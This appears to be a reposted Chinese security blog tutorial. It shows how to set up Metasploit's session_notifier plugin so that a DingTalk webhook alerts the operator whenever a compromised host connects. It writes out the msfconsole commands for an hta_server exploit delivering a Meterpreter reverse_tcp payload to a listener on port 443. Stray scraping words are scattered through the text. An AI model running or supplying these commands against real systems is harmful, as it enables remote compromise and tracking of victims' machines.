全部话题标签:#Web安全 #漏洞复现 #工具使用 #权限提高#权限维持 #防御绕过 #内网安全 #实战案例 #其余笔记 #资源分享 #MSFjavascript |
0x01 前言java
https://github.com/rapid7/metasploit-framework/pull/13571git
0x01 钉钉机器人webhook配置github


0x02 session_notifier插件配置web
kali~# msfconsole -q :msf6 > load session_notifiermsf6 > set_session_dingtalk_webhook https://oapi.dingtalk.com/robot/send?access_token=msf6 > start_session_notifier
restart_session_notifier //从新启动会话通知save_session_notifier_settings //将全部会话通知设置保存到框架set_session_dingtalk_webhook //设置DingTalk会话通知(关键字: session)set_session_maximum_ip //设置会话通知最大IP范围set_session_minimum_ip //设置会话通知最小IP范围set_session_mobile_carrier //设置手机的移动运营商set_session_mobile_number //设置您要通知的10位手机号码set_session_smtp_address //设置会话通知SMTP地址set_session_smtp_from //设置SMTP发件人set_session_smtp_password //设置SMTP密码set_session_smtp_port //设置会话通知SMTP端口set_session_smtp_username //设置SMTP用户名start_session_notifier //开始会话通知stop_session_notifier //中止会话通知
随便设置了一个hta_server监听模块来测试一下看是否可以实时收到新上线主机的通知。
windows
msf6 > use exploit/windows/misc/hta_server msf6 exploit(windows/misc/hta_server) > set target 1msf6 exploit(windows/misc/hta_server) > set payload windows/x64/meterpreter/reverse_tcpmsf6 exploit(windows/misc/hta_server) > set lhost 39.**.*.238msf6 exploit(windows/misc/hta_server) > set lport 443msf6 exploit(windows/misc/hta_server) > exploit
这里咱们能够看到钉钉群组里已经成功的收到了机器人发送过来的新上线主机通知信息!!!api

禁止非法,后果自负安全
欢迎关注公众号:web安全工具库微信
本文分享自微信公众号 - web安全工具库(websec-tools)。
若有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一块儿分享。session